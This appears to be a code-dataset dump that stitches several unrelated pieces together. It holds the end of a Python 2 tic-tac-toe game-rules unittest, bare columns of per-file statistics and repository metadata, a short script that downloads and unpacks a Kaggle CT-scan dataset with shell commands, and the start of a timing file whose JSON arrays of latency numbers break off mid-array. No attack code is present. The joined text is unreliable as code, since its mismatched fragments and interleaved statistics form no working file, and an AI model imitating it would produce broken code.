(DIAGONAL ?X) (TRUE (CELL 1 1 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 3 ?X))) (<= (DIAGONAL ?X) (TRUE (CELL 1 3 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 1 ?X))) (<= (LINE ?X) (ROW ?M ?X)) (<= (LINE ?X) (COLUMN ?M ?X)) (<= (LINE ?X) (DIAGONAL ?X)) (<= OPEN (TRUE (CELL ?M ?N B))) (<= (GOAL WHITE 100) (LINE X) (NOT (LINE O))) (<= (GOAL WHITE 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL WHITE 0) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 100) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL BLACK 0) (LINE X) (NOT (LINE O))) (<= TERMINAL (LINE X)) (<= TERMINAL (LINE O)) (<= TERMINAL (NOT OPEN))""" #---------------------------------------------------------- # #---------------------------------------------------------- def get_joint_move(state, player2move_dict): for jm in state.joints(): jms = {str(p) : str(m) for (p,m) in jm.iteritems()} if all(item in jms.items() for item in player2move_dict.items()): return jm return None #---------------------------------------------------------- # #---------------------------------------------------------- class TictactoeTest(unittest.TestCase): #----------------------------- # Test tictactoe from stanford #----------------------------- def test_tictactoe1(self): global g_ttt1 # Create game game = Game(gdl=g_ttt1) self.assertEqual(len(game.players()), 2) self.assertEqual(len(game.players()), game.num_players()) white = next((r for r in game.players() if str(r) == "white"), None) black = next((r for r in game.players() if str(r) == "black"), None) self.assertTrue(white is not None) self.assertTrue(black is not None) # Track moves from the initial state to termination state = State(game) # Move 1 jm = get_joint_move(state, {'white': '(mark 1 1)', 'black' : 'noop'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 2 jm = get_joint_move(state, {'white': 'noop', 'black' : '(mark 2 1)'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 3 jm = get_joint_move(state, {'white': '(mark 1 2)', 'black' : 'noop'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 4 jm = get_joint_move(state, {'white': 'noop', 'black' : '(mark 2 2)'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 5 jm = get_joint_move(state, {'white': '(mark 1 3)', 'black' : 'noop'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertTrue(state.is_terminal()) # Test the gaol scores gs = state.goals() print "Score: {0}".format(gs) self.assertEqual(gs[white], 100) self.assertEqual(gs[black], 0) #----------------------------- # Test tictactoe as produced by the Dresden gamecontroller #----------------------------- def test_tictactoe2(self): global g_ttt2, g_ttt3 # Create game game = Game(gdl=g_ttt3) self.assertEqual(len(game.players()), 2) self.assertEqual(len(game.players()), game.num_players()) white = next((r for r in game.players() if str(r) == "WHITE"), None) black = next((r for r in game.players() if str(r) == "BLACK"), None) self.assertTrue(white is not None) self.assertTrue(black is not None) # Track moves from the initial state to termination state = State(game) # Move 1 jm = get_joint_move(state, {'WHITE': '(MARK 1 1)', 'BLACK' : 'NOOP'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 2 jm = get_joint_move(state, {'WHITE': 'NOOP', 'BLACK' : '(MARK 2 1)'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 3 jm = get_joint_move(state, {'WHITE': '(MARK 1 2)', 'BLACK' : 'NOOP'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 4 jm = get_joint_move(state, {'WHITE': 'NOOP', 'BLACK' : '(MARK 2 2)'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertFalse(state.is_terminal()) # Move 5 jm = get_joint_move(state, {'WHITE': '(MARK 1 3)', 'BLACK' : 'NOOP'}) self.assertTrue(jm is not None) print "Playing: {0}".format(jm) state.play(jm) self.assertTrue(state.is_terminal()) # Test the gaol scores gs = state.goals() print "Score: {0}".format(gs) self.assertEqual(gs[white], 100) self.assertEqual(gs[black], 0) #----------------------------- # main #----------------------------- def main(): unittest.main() if __name__ == '__main__': main()
34.751282
2,022
0.434811
1,745
13,553
3.346132
0.072206
0.078096
0.043158
0.028772
0.916938
0.916938
0.897414
0.897414
0.897414
0.897414
0
0.020904
0.234044
13,553
389
2,023
34.840617
0.541566
0.091788
0
0.406844
0
0.072243
0.692859
0.110858
0
0
0
0
0.121673
0
null
null
0
0.011407
null
null
0.045627
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
0
0
0
0
0
0
0
1
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
9
bb7e196ce7a1a0fe2d37f65e1115eec30f2076bb
372
py
Python
load_datasets/load_sarscov2-ctscan-dataset.py
ArthurMor4is/grad-cam-covid-19-ct
14474a635e7633c8382839582d2a2cd9ff98eb62
[ "MIT" ]
null
null
null
load_datasets/load_sarscov2-ctscan-dataset.py
ArthurMor4is/grad-cam-covid-19-ct
14474a635e7633c8382839582d2a2cd9ff98eb62
[ "MIT" ]
null
null
null
load_datasets/load_sarscov2-ctscan-dataset.py
ArthurMor4is/grad-cam-covid-19-ct
14474a635e7633c8382839582d2a2cd9ff98eb62
[ "MIT" ]
null
null
null
import os # Import and organizing sarscov2-ctscan-dataset os.system("kaggle datasets download -d plameneduardo/sarscov2-ctscan-dataset") os.system("unzip sarscov2-ctscan-dataset.zip") os.system("mkdir sarscov2-ctscan-dataset") os.system("mv COVID sarscov2-ctscan-dataset") os.system("mv non-COVID sarscov2-ctscan-dataset") os.system("rm -rf sarscov2-ctscan-dataset.zip")
37.2
78
0.793011
54
372
5.462963
0.388889
0.332203
0.498305
0.389831
0.538983
0.342373
0
0
0
0
0
0.020231
0.069892
372
9
79
41.333333
0.83237
0.120968
0
0
0
0
0.704615
0.492308
0
0
0
0
0
1
0
true
0
0.142857
0
0.142857
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
1
null
0
0
0
0
0
0
1
0
0
0
0
0
0
7
bb8858db8d10e11e28ef734c0c49b5c1977c3c77
92,738
py
Python
tmp/timing.py
kcarnold/sentiment-slant-gi18
6028b42627e3eec14a1f27986f8925d8b1e6ad9c
[ "MIT" ]
null
null
null
tmp/timing.py
kcarnold/sentiment-slant-gi18
6028b42627e3eec14a1f27986f8925d8b1e6ad9c
[ "MIT" ]
null
null
null
tmp/timing.py
kcarnold/sentiment-slant-gi18
6028b42627e3eec14a1f27986f8925d8b1e6ad9c
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Tue Jun 13 13:55:21 2017 @author: kcarnold """ import json #%% # Baseline stats = ''' {"numInflight":0,"nosugg":[238,30,132,492,24,70,259,42,62,85,234,109,37,50,29,60,30,51,149,119,153,100,37,48,31,56,32,63,27,48,462,270,357,46,26,57,95,427,117,188,152,27,48,55,63,50,170,206,119,82,81,36,81,50,58,67,63,53,57,58,88,48,45,24,46,56,63,42,76,70,57,154,186,393,191,127,241,470,207,276,64,49,64,52,55,48,182,59,186,310,28,32,45,26,62,53,322,263,59,98,107,60,350,352,26,40,51,57,61,63,63,51,46,55,50,57,66,40,25,59,58,82,46,36,45,68,73,30,26,68,68,281,48,4,5,23,4,6,26,3,32,30,54,490,54,55,39,315,43,43,70,171,31,78,191,54,52,49,24,59,36,48,66,73,62,18,46,189,40,68,76,54,366,57,43,351,109,33,52,52,35,62,52,4,5,43,6,9,74,7,56,45,44,198,61,191,75,117,71,431,321,40,49,36,34,56,68,214,67,86,104,76,31,41,48,45,272,42,360,65,401,49,135,289,36,436,213,173,428,550,294,701,281,389,483,130,133,291,373,182,318,69,78,38,675,516,121,82,66,117,68,377,275,248,195,58,400,181,333,439,443,249,381,282,158,240,369,377,476,367,166,20,66,26,483,270,233,371,83,315,318,165,494,234,217,224,425,427,519,624,334,236,480,583,116,347,210,299,307,50,167,212,96,188,223,295,371,82,411,217,68,461,815,873,103,97,286,12,245,98,108,305,358,124,104,53,59,141,367,46,98,429,427,298,397,16,9,105,134,319,468,545,607,421,239,257,411,265,281,281,330,145,188,123,210,179,140,293,256,133,121,124,413,33,240,101,131,347,348,93,373,425,216,302,160,43,68,328,335,270,230,242,50,567,564,172,290,375,68,47,49,217,297,277,268,171,77,80,56,264],"diverse":[257,564,185,507,171,358,224,411,461,183,392,191,391,326,187,189,381,368,195,396,379,420,325,285,493,321,317,512,176,173,285,364,206,485,507,667,6,200,405,659,5,104,284,4,4,24,207,339,556,193,372,196,512,209,547,543,188,289,168,429,349,193,356,187,233,182,177,348,182,364,227,209,251,187,509,62,97,172,186,307,94,207,50,154,269,257,279,561,709,220,353,322,183,363,198,508,57,243,164,65,123,386,202,404,135,179,23,21,18,70,200,179,360,195,384,181,403,245,520,266,381,10,174,256,221,188,401,336,179,222,252,88,186,361,281,588,297,493,199,345,203,178,499,295,19,18,133,332,326,336,530,327,386,253,297,50,94,216,140,186,379,471,490,196,592,409,118,334,729,298,388,255,350,280,529,669,12,10,214,212,558,174,329,190,405,101,454,342,281,1040,457,317,911,929,342,378,201,458,451,424,528,313,88,366,636,303,497,5,516,349,461,330,327,228,432,553,488,323,322,254,426,540,407,411,272,184,180,256,305,366,246,258,512,322,168,204,67,455,59,337,4,8,420,193,188,509,511,487,313,249,328,189,248,449,536,539,199,497,517,94,364,329,107,6,55,188,317,378,460,325,199,72,112,137,96,125,478,65,84,69,268,399,352,348,262,364,436,681,211,428,309,453,345,495,328,516,353,335,303,464,290,289,533,415,368,465,368,220,115,374,423,339,431,581,295,338,216,482,786,399,492,339,403,383,139,515,380,365,369,366,267,573,259,495,330,492,369,336,253,354,504,311,286,582,570,346,225,135,486,129,473,563,441,421,349,186,513,310,106,87,614,559,320,432,438,446,232,371,204,408,511,473,335,66,350,96,346,423,876,418,501,113,103,247,94,287,185,209,258,353,94,201,373,293,253,96,96,69,107,215,360,273,106,257,375,137,143,359,212,75,190,131,15,184,141,516,49,241,264,176,109,297,161,356,228,198,169,716,388,231,427,227,208,359,116,597,222,470,238,90,92,175,411,236,336,195,419,333,231,143,479,479,224,210,176,191,246,241,290,390,409,348,222,255,31,406,181,30,8,11,184,100,130,49,255,231,328,344,166,233,676,676,198,326,214,307,597,597,228,266,373,264,273,168,229,437,341],"match":[262,176,365,237,199,380,184,364,183,351,171,357,460,531,440,178,388,194,232,356,353,308,203,393,171,509,328,192,378,172,344,381,272,167,339,344,311,699,543,261,294,452,221,409,305,41,174,524,181,33,364,200,425,610,233,373,24,229,252,314,54,93,178,341,279,262,209,400,253,244,491,180,368,200,230,418,164,480,289,570,177,382,184,130,275,208,395,207,518,460,901,909,690,379,381,202,379,308,175,352,210,414,76,263,245,326,36,329,354,193,523,316,37,211,221,384,213,203,556,327,394,313,479,225,305,216,387,460,220,428,63,110,307,273,516,132,44,233,179,354,188,362,251,275,428,390,436,173,362,164,344,380,170,352,190,362,319,523,187,192,387,201,168,253,185,361,193,383,26,44,190,366,104,244,307,178,357,411,327,260,277,493,511,215,468,179,375,195,382,212,229,481,355,312,383,210,417,482,307,291,526,207,209,383,133,312,210,460,182,347,275,177,368,110,169,325,289,524,38,81,224,523,264,53,320,42,271,64,318,612,234,27,197,366,203,348,398,478,700,190,484,588,551,191,374,91,87,178,650,598,41,70,232,534,192,385,190,174,389,174,356,4,3,2,3,2,53,67,47,359,316,195,481,345,294,248,291,219,292,47,278,210,402,194,450,64,271,28,202,175,347,219,537,236,375,460,307,82,365,309,176,355,215,229,405,209,275,191,252,225,91,412,201,384,140,175,188,568,350,543,543,170,424,332,438,718,52,75,162,348,169,375,174,224,250,473,199,467,174,421,214,518,204,342,184,345,191,341,218,184,255,276,176,350,192,367,267,276,292,414,175,355,252,209,185,504,238,364,312,169,355,409,331,182,369,34,60,156,319,173,364,187,417,230,302,305,617,434,192,184,362,197,248,202,306,208,379,196,377,330,417,207,268,395,166,200,679,509,312,317,330,426,667,568,197,379,387,253,250,240,216,216,577,482,582,490,247,341,266,271,196,303,81,126,287,586,310,201,346,212,353,293,44,91,290,428,191,345,584,562,590,40,91,216,366,255,317,269,330,423,337,327,886,370,229,38,81,523,540,199,418,546,216,460,303,284,348,295,234,191,353,60,224,136,414,272,347,272,342,771,1019,1041,1042,170,277,604,606,607,836,938,940,403,241,836,926,950,917,191,56,216,60,314,466,489,257,354,447,253,288,402,47,61,187,6,174,274,293,44,172,253,459,319,322,391,450,201,203,365,442,444,338,341,661,738,740,759,368,424,257,460,456,187,528,529,38,75,336,237,238,190,89,224,67,248,179,313,317,413,589,636,658,303,336,437,507,504,191,423,499,202,152,151,242,169,270,393,173,192,7,403,519,365,366,17,312,315,330,463,331,245,326,382,464,469,76,325,466,466,241,243,246,386,434,128,444,531,243,292,174,68,356,415,420,180,481,491,326,341,356,65,325,309,309,78,197,471,470,74,188,7,225,429,162,162,223,211,371,439,540,130,223,303,332,394,205,334,99,99,152,367,401,419,199,7,333,355,256,318,179,179,184,260,75,366,327,329,35,59,178,296,320,399,500,192,198,510,510,75,321,325,346,350,351,342,359,183,291,302,186,327,387,256,319,255,452,301,301,120,75,138,182,49,244,408,408,243,344,65,196,492,496,448,541,607,609,201,259,277,328,302,302,170,174,165,175,325,25,301,333,408,486,180,232,435,435,311,376,377,167,272,188,76,257,455,457,351,97,400,419,443,246,321,343,346,245,315,367,559,139,226,186,345,345,230,249,462,465,235,332,333,92,352,296,349,247,317,199,194,321,342,169,302,369,396,394,457,224,318,340,147,259,348,198,318,339,187,232,269,485,487,338,428,277,487,486,190,77,83,246,276,481,68,208,219,220,101,217,66,186,64,343,316,316,280,360,302,396,698,717,98,74,170,355,429,518,519,348,132,676,679,254,347,348,343,223,177,271,43,113,203,95,184,121,428,101,333,352,210,210,66,556,627,630,339,339,353,353,337,338,367,351,355,335,496,235,331,407,515,516,520,218,352,548,547,174,437,466,292,395,351,363,280,363,216,352,298,415,652,699,702,254,28,264,364,365,281,353,387,330,339,481,147,150,238,137,485,583,111,206,417,275,285,385,371,282,514,220,666,671,669,464,514,516,519,372,374,338,192,189,285,401,401,459,463,207,178,280,336,440,582,217,254,348,333,335,191,389,343,383,439,320,433,533,535,533,582,317,465,470,333,434,498,646,694,786,300,282,199,392,494,234,342,295,338,209,403,502,502,385,240,373,511,518,416,518,234,473,477,267,366,383,434,363,267,268,367,379,263,272,69,223,384,481,485,422,422,520,272,363,423,516,520,233,368,371,268,470,485,257,271,326,85,340,341,341,394,161,319,418,219,230,390,392,495,285,96,399,494,469,518,286,334,219,353,314,301,452,160,257,285,286,223,316,233,332,136,384,385,441,566,566,663,667,223,391,391,279,326,425,196,192,342,492,213,325,326,424,373,609,273,524,625,623,210,345,427,320,288,485,584,202,391,198,387,486,224,419,418,512,614,665,186,587,589,593,788,212,296,445,204,205,336,136,504,503,603,603,209,19,369,207,187,317,366,187,412,417,616,114,114,49,169,267,465,466,562,209,153,215,195,366,369,371,205,134,339,340,311,314,285,292,383,485,499,189,384,436,200,224,225,228,319,347,231,293,70,269,272,80,111,114,208,413,511,202,129,219,179,413,473,195,195,335,336,139,140,251,133,228,69,252,351,386,461,464,197,263,263,98,183,426,315,315,189,124,710,809,873,880,361,501,268,346,96,176,254,132,152,346,264,365,236,348,70,101,330,342,190,159,372,288,286,368,100,358,93,274,339,425,512,140,254,264,290,365,367,161,356,168,966,968,972,288,186,427,231,329,198,262,306,396,480,579,583,308,368,205,198,249,206,265,359,207,266,103,123,320,419,470,514,594,217,759,807,968,359,972,458,419,409,338,414,429,290,247,479,290,181,409,96,347,409,281,330,278,377,292,293,307,351,268,229,347,54,87,663,674,291,373,20,266,27,325,425,22,23,6,323,364,307,450,447,250,45,67,328,328,222,332,327,373,413,125,221,157,314,316,490,563,565,286,313,273,356,121,227,347,261,266,192,310]} ''' #%% # Lots of samples with # - parallel sentiment classification, chunksize=32 # - printing disabled stats = ''' {"numInflight":0,"nosugg":[44,64,74,33,62,120,28,46,47,64,27,61,260,36,60,31,51,93,63,83,55,85,50,30,58,62,30,145,102,30,138,87,33,54,227,146,61,66,50,53,47,84,123,87,54,99,40,85,135,80,77,68,106,94,275,146,242,38,81,340,36,80,37,82,73,58,111,66,112,62,110,28,50,58,147,30,55,28,78,30,51,39,57,86,122,95,131,29,47,130,26,62,33,51,146,42,28,58,83,29,47,27,52,29,47,108,26,42,121,121,29,63,29,48,89,159,29,47,31,51,43,58,40,60,41,48,53,113,73,128,111,199,83,293,141,4,4,2,2,3,25,61,58,28,67,47,74,31,56,40,70,46,63,211,73,33,53,45,85,26,24,52,34,63,27,44,70,51,65,47,98,46,64,51,53,113,81,77,45,83,183,179,104,99,107,64,67,104,75,81,230,79,82,183,529,78,122,52,95,77,73,70,51,61,77,23,64,80,63,71,37,83,53,50,221,69,52,230,65,48,88,193,279,237,195,176,49,4,41,37,42,4,188,73,69,66,37,143,85,63,59,214,199,67,112,59,65,54,83,40,85,84,93,65,67,81,126,101,76,78,135,177,31],"diverse":[370,433,160,470,241,232,364,162,308,236,393,189,168,268,451,155,398,359,376,203,158,280,233,141,304,240,153,144,285,122,121,258,432,88,172,9,8,141,140,151,150,7,161,173,456,224,155,296,141,278,132,282,55,286,227,400,96,236,322,175,317,149,284,270,322,153,287,45,168,255,271,430,266,126,254,189,279,151,209,268,48,47,143,273,6,34,156,369,104,232,132,177,163,66,109,160,151,290,291,162,166,266,303,167,330,372,178,294,342,141,176,255,280,422,423,131,129,140,233,28,25,91,236,108,32,63,263,403,40,128,212,184,274,233,140,285,263,98,228,173,459,18,17,34,53,249,281,279,360,241,175,219,147,298,449,181,225,35,171,170,313,146,278,142,272,408,343,156,462,538,468,114,210,102,158,148,274,35,292,363,171,75,324,371,291,659,156,298,169,315,127,271,360,149,285,177,141,263,268,537,260,326,133,256,252,153,287,125,200,136,260,186,424,138,156,382,162,275,168,143,368,155,285,133,373,140,282,257,261,369,243,471,51,151,214,161,303,155,379,155,143,399,160,182,404,119,63,67,135,139,459,141,138,174,319,171,169,208,163,233,304,249,292,195,62,105,138,183,220,84,223,45,80,245,739,743,310,355,182,274,142,294,231,272,59,204,238,281,344,437,140,205,306,394,273,175,126,295,409,210,200,302,296,250,132,257,269,491,83,183,109,129,41,177,122,244,164,416,261,115,165,104,240,170,323,278,475,206,193,342,258,302,93,230,590,617,334,262,307,181,185,128,183,162,311,504,341,162,161,200,198,254,337,381,793,403,532,184,217,171,314,450,56,61,328,288,333,310,372,256,145,333,106,444,233,41,149,164,346,124,259,361,416,219,349,296,444,585,197,247,155,398,380,202,202,151,184,140,183,204,283,70,67,47,59,141,286,152,189,159,154,146,142,22,161,282,322,309,355,287,325,130,289,7,6],"match":[144,491,374,327,355,312,499,667,364,311,145,274,12,8,6,124,165,141,270,71,122,380,127,236,360,257,137,275,467,169,147,287,154,143,284,53,150,118,242,118,251,171,299,283,128,262,123,289,148,313,98,131,278,141,272,358,334,547,176,148,178,147,270,142,280,143,396,266,261,406,34,147,132,267,146,302,147,276,249,191,491,260,241,202,382,144,156,293,203,141,184,239,195,301,661,426,173,299,159,301,233,148,291,249,197,398,128,298,300,245,269,391,244,275,319,133,190,366,152,299,172,299,164,298,183,299,250,557,464,156,315,238,409,257,289,221,567,541,350,431,165,142,295,153,393,248,97,131,236,140,280,172,297,64,77,123,170,151,275,153,155,294,178,124,266,114,161,143,479,225,39,172,38,55,126,261,275,137,65,15,289,286,426,119,232,35,52,142,267,128,261,47,165,140,115,272,234,157,274,142,271,142,244,278,191,246,280,152,285,115,241,176,304,141,256,135,163,385,201,125,260,239,189,139,348,145,137,275,144,175,303,141,366,253,257,212,418,474,147,112,146,134,223,142,287,118,177,48,79,139,272,133,262,152,131,328,51,176,126,250,275,183,547,292,177,302,46,74,127,267,4,4,4,4,3,31,68,134,262,112,168,340,340,386,223,191,196,225,256,126,263,330,218,262,244,251,196,248,109,162,254,192,189,175,174,319,196,423,180,181,267,312,332,146,191,139,486,382,348,57,190,174,272,52,88,146,233,317,158,251,259,304,486,447,531,332,272,310,196,151,284,203,139,332,60,125,265,202,247,118,293,150,399,221,233,289,96,140,251,198,147,175,346,344,79,124,195,375,181,362,166,211,52,97,391,364,200,486,114,245,177,288,261,427,238,316,280,324,230,273,378,313,268,275,114,282,146,290,68,113,150,400,259,245,234,314,171,306,227,307,222,277,239,244,385,260,266,285,290,259,415,653,390,367,243,238,319,172,309,186,472,207,175,318,237,282,111,158,291,177,315,164,108,182,188,143,283,144,259,145,286,154,128,273,48,72,292,588,519,789,261,391,143,153,257,386,168,138,193,147,190,179,295,13,154,294,128,256,38,176,128,245,149,280,32,55,216,202,352,129,381,169,131,367,141,288,152,295,42,176,130,382,207,143,279,135,231,143,294,127,235,158,136,252,364,177,139,52,115,135,255,317,431,50,68,24,149,275,221,269,592,319,254,217,385,150,122,297,132,260,144,273,149,384,125,215,355,204,179,156,308,144,369,378,127,299,201,140,442,411,194,244,277,550,177,162,294,154,272,366,327,312,130,228,149,291,108,237,256,247,274,99,137,144,299,157,201,55,82,141,310,6,31,37,62,7,39,125,233,156,47,155,293,194,345,247,357,122,133,260,37,160,128,247,139,267,68,27,100,131,384,242,231,388,239,122,163,230,42,81,172,95,296,116,230,237,27,53,43,65,34,61,53,138,475,331,33,158,156,278,144,311,259,361,149,276,96,24,139,139,365,34,72,128,263,75,151,286,306,151,138,269,146,261,185,331,254,173,156,165,147,175,147,373,220,274,232,189,441,131,260,136,270,130,258,320,353,310,148,274,241,293,256,291,91,231,277,158,521,219,274,210,295,135,286,151,295,283,298,294,618,249,290,635,585,360,157,297,143,380,274,170,315,203,156,354,337,196,173,216,296,282,277,427,22,156,190,187,209,277,357,274,276,418,213,278,601,582,682,68,107,219,232,420,159,147,293,67,112,196,240,237,149,284,152,219,301,172,168,110,154,182,136,280,250,287,375,312,499,722,343,297,329,142,249,185,183,142,385,239,98,97,226,280,356,174,155,278,240,344,288,389,232,302,272,399,158,303,304,166,263,164,209,296,303,657,420,156,226,72,215,241,273,420,141,404,60,83,167,227,52,74,145,272,145,319,160,283,143,239,208,380,53,203,43,160,57,82,137,122,282,155,150,155,280,172,306,397,130,267,5,38,64,137,267,138,375,225,28,56,166,253,392,110,221,372,242,218,542,177,7,36,138,286,141,140,277,136,293,159,246,46,186,159,324,99,229,165,140,273,160,114,262,142,269,128,276,172,310,120,260,152,169,298,135,277,191,226,36,165,42,121,233,132,254,255,35,179,34,170,198,195,175,273,257,175,420,218,218,121,304,142,221,314,242,328,316,310,407,276,72,118,259,124,121,150,359,313,159,612,488,705,323,96,100,255,296,249,294,264,309,387,348,432,260,305,295,481,477,315,242,265,267,216,300,143,190,173,328,299,837,750,699,781,693,300,284,333,540,501,589,179,180,76,222,164,411,153,138,228,188,146,285,167,311,212,255,157,133,307,247,338,178,159,299,173,356,154,287,149,407,175,83,163,164,551,324,221,196,323,50,203,200,144,196,206,254,258,398,243,423,197,53,83,65,61,179,325,247,395,482,147,384,217,310,142,289,162,206,44,40,148,435,220,220,200,350,190,621,217,316,332,159,404,150,340,53,332,288,44,79,180,173,356,227,390,443,689,242,300,365,488,62,201,68,164,184,619,497,322,198,50,195,191,329,424,392,573,230,313,165,404,318,180,368,147,286,56,157,302,250,296,241,429,206,224,310,143,286,175,219,175,225,6,56,252,541,414,409,454,323,369,140,169,195,444,252,339,476,207,183,375,163,303,42,195,153,296,201,157,210,250,295,186,276,228,263,20,58,281,311,420,501,146,291,138,283,179,328,285,317,493,560,161,405,170,6,141,11,9,211,303,165,309,45,223,265,369,29,28,176,322,167,177,324,116,164,129,211,234,273,161,255,210,361,308,55,63,185,162,224,60,105,186,325,237,299,101,194,313,367]} ''' #%% # Optimized. stats = ''' {"numInflight":0,"nosugg":[319,159,19,40,47,111,26,42,24,37,22,43,62,80,21,46,226,121,27,59,29,40,22,32,99,30,24,37,38,34,56,69,34,49,21,26,32,49,56,58,76,199,132,20,36,111,26,38,59,65,40,25,41,32,45,65,66,27,43,59,98,20,31,32,21,39,98,30,41,91,108,49,75,59,33,62,30,53,198,55,21,33,22,36,26,43,41,55,22,34,184,82,216,89,25,36,77,119,20,32,21,47,109,21,32,21,53,21,34,33,49,34,91,70,67,50,47,106,102,42,83,109,116,112,64,60,51,49,71,68,165,48,61,51,4,2,3,2,3,3,17,30,141,534,73,97,20,32,34,51,30,59,33,20,45,28,40,43,89,29,43,22,29,47,37,53,53,21,33,21,59,53,35,47,20,30,46,38,159,88,84,64,60,74,69,69,65,72,69,100,80,49,59,38,67,73,45,42,64,67,48,44,40,3,47,43,47,68,63,64,39,84,70,68,67,112,66,73,80,39,138,68,63,57,57,84,81,73,71,54,30,74,42,113,2,2,22,17,21,37,19,31,21,34,4,37,34,26,101,22,47,39,34,24,42,51,66,77,28,59,49,18,41,19,36,98,25,60,23,32,43,21,57,15,27,92,56,22,70,60,75,127,43,63,62,109,60,35,128,33,41,36,38,65,61,65,62,54,76,71,23,52,112,60,104,134,51,47,48,45,70,67,69,78,51,47,40,39,101,128,39,50,78,75,54,138,386,65,61,46,89,91,53,50,50,180,176,75,64,83,84,182,77,75,83,79,65,61,78,75,61,57,39,86,74,69,52,91,44,89,95,62,65,61,57,83,84,78,73,74,117,41,37,63,43,44,60,54,47,70,90,71,71,51,91,85,86,114,118,119,288,26,49,50,47,89,92,47,49,50,159,79,47,95,104,63,41,212,212,34,36,49,48,43,43,56,56,41,57,57,231,185,56,62,163,200,78,170,72,72,17,87,38,128,6,16,15,97,4,72,177,43,37,116,143,146,121,38,28,53,28,28,55,36,47],"diverse":[207,303,174,352,96,201,104,232,119,233,130,225,110,340,129,106,149,105,221,144,257,128,226,34,225,208,149,127,332,262,422,113,205,6,129,50,12,66,275,281,289,241,140,5,4,5,115,259,192,124,278,111,239,147,352,26,128,115,219,125,224,118,223,320,675,104,155,67,122,69,91,208,134,116,218,154,150,102,307,208,148,108,137,110,450,121,227,105,204,195,183,120,292,60,100,7,44,44,6,33,79,209,65,30,69,268,225,68,81,68,115,227,147,353,237,213,398,195,265,167,348,127,230,31,147,242,4,137,135,126,234,13,125,239,18,17,125,239,40,140,76,302,383,107,202,135,167,127,129,209,110,210,191,297,55,244,115,143,249,116,209,87,7,6,178,6,4,280,95,172,83,239,113,213,262,438,111,55,354,126,240,246,6,117,145,649,95,199,119,275,139,61,192,275,322,111,442,115,326,105,128,239,64,170,289,200,189,299,119,222,115,278,101,202,7,7,136,283,102,202,221,305,106,228,107,127,325,125,196,160,345,133,252,100,96,239,225,124,327,108,251,166,28,77,127,269,620,141,200,61,84,44,80,41,66,64,90,141,236,49,123,225,176,135,267,229,158,273,142,184,130,268,212,238,272,112,208,148,278,382,127,209,152,196,229,413,201,187,231,177,173,287,143,150,219,60,69,126,126,220,116,221,116,211,124,337,145,186,107,211,618,722,101,215,248,173,166,104,192,170,370,116,136,137,45,173,40,61,186,318,115,233,255,133,328,106,202,45,152,120,225,93,145,193,116,105,293,119,214,112,80,177,134,108,357,119,209,68,213,43,50,77,306,112,245,334,172,325,121,259,114,152,258,313,51,48,104,232,115,245,233,95,196,133,233,80,85,122,150,39,40,35,214,257,46,99,61,145,37,82,140,243,167,63,69,175,120,152,75,263,149,103,196,101,123,169,128,167,250,597,162,120,234,203,223,110,220,119,212,130,253,99,210,233,101,100,119,119,6,116,100,155,275,158,119,250,118,217,120,365,245,40,77,122,269,128,283,84,110,158,484,120,198,46,134,104,203,99,204,138,381,218,142,281,130,347,148,125,216,92,325,135,110,151,253,101,195,106,99,184,91,257,197,105,211,156,79,144,134,148,331,171,213,246,231,276,260,258,147,63,97,230,275,104,197,167,149,485,346,251,198,244,119,260,201,173,318,185,246,278,103,203,7,39,184,181,211,137,228,38,133,96,195,241,53,59,155,214,255,189,234,233,279,148,241,203,353,24,23,107,289,109,83,82,114,220,150,95,182,217,134,289,325,43,52,181,104,151,110,20,202,105,61,111,9,119,96,214,146,166,63,13,94,114,72,85,93,135,134,11,225,268,237,122,190,147,129,114,208,44,6,30,26,10,231,237,149,183,190,218,133,211,135,96,195,195,299,132,40,100,27,196,236,46,159,185,130,181,113,32,73,24,89,131,104,186,235,204,86,65,68,233,173,148,211,29,430,134,158,111,7,6],"match":[95,193,191,104,384,330,350,100,222,100,191,118,205,96,191,104,200,103,181,98,212,96,177,103,278,155,98,190,176,184,135,215,390,138,120,186,39,105,234,120,221,125,216,139,139,249,204,115,255,283,129,263,113,133,237,8,96,117,241,56,102,205,170,131,100,115,123,228,246,107,219,143,265,356,331,216,112,229,113,233,105,202,199,124,196,128,51,125,239,65,107,117,220,102,205,41,63,115,211,100,209,272,268,151,66,260,111,228,114,348,423,162,326,468,127,166,146,278,51,171,196,127,221,109,216,142,348,147,271,110,229,12,235,226,509,257,290,106,275,143,254,130,330,196,101,216,130,71,262,250,240,123,231,70,191,193,117,209,242,224,335,306,360,147,283,132,243,231,90,200,98,132,255,336,100,222,201,312,109,193,112,239,96,212,141,127,214,141,254,99,199,185,325,86,101,250,98,130,222,201,263,48,69,95,127,115,330,268,97,200,28,41,24,109,99,209,282,232,161,111,211,116,217,108,226,335,321,331,326,46,51,6,5,17,16,92,191,113,214,7,84,103,105,227,136,189,304,117,226,101,210,114,214,102,202,103,42,204,96,196,118,161,80,115,96,194,123,262,113,226,132,228,42,54,107,217,101,143,113,199,151,298,132,238,31,61,151,162,288,108,312,219,25,53,71,27,214,243,252,74,185,168,366,144,277,130,263,144,255,113,230,285,262,393,485,140,176,109,211,